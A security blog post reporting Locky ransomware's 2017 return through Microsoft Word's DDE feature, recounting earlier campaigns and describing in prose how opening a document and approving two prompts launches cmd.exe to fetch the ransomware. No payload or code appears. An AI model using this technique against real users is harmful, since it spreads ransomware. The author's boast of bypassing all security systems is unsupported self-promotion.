LOCKY RANSOMWARE RETURNS USING MICROSOFT WORD DDE FUNCTIONALITY

Locky Ransomware attempts again to invade the cyber-world, this October 2017, using the Dynamic-Data-Exchange (DDE) functionality of Microsoft Word.

Beforehand, a ransomware known as Locky had made chaos across the world in 2016, and devastated a great number of computers worldwide.

On August 2017, said ransomware made its way back into cyberspace using the Diablo6 variant, and targeted computers in the United States, followed by Austria, using Microsoft Word with a VBS Downloader script.

Then, Locky has emerged again this September 2017 with a new scheme of spreading through a spam email which pretends like a legitimate Dropbox notification email.

This October 2017, the developers of Locky showed their persistence and have found a different and more effective scheme to spread the Locky ransomware once again.

The most recent Locky ransomware utilizes the Dynamic-Data-Exchange (DDE) functionality of Microsoft Word.  The DDE allows the simultaneous updates of data from one platform to another.  In DDE functions, a change of a data in a cell in an MS Excel can be linked to a MS Word document to automatically update the change.  This can also be executed vice versa, or between two MS Word documents.

The DDE functionality is automatically enabled after the installation of Microsoft Office.  Locky developers have found a way to exploit the DDE and use its auto update of data feature to transfer the ransomware from their server to the target system.

The DDE has been built since 1987.  Even after numerous attempts of security firms to warn Microsoft to halt incorporating DDE in their programs, DDE can still be found until now, even in the most widely-used software like Microsoft Office.

The Locky Ransomware attack begins after the MS Word document has been opened.   It then runs the DDE function, and a notification will appear requesting permission to update the fields that refer to other files.  Once approved by the user, a subsequent notification will appear asking to start the cmd.exe.  Upon confirming the two notifications, the ransomware attack shall commence.

The following are images of the notifications from MS Word:

 

This DDE exploit can be used even without the aid of macros or memory corruption.

The following is a screenshot of an infected computer by Locky Ransomware:

 

 

Manny Cuevas

My name is Manny Cuevas a Security Researcher / Engineer for about 15 years that focuses on Web and Mobile applications and other platforms from the Island of Sulu, Philippines. I’m also a scientist, inventor and a top ranked hacker in the world that bypass all security systems.

 

Leave a Reply

Your email address will not be published. Required fields are marked *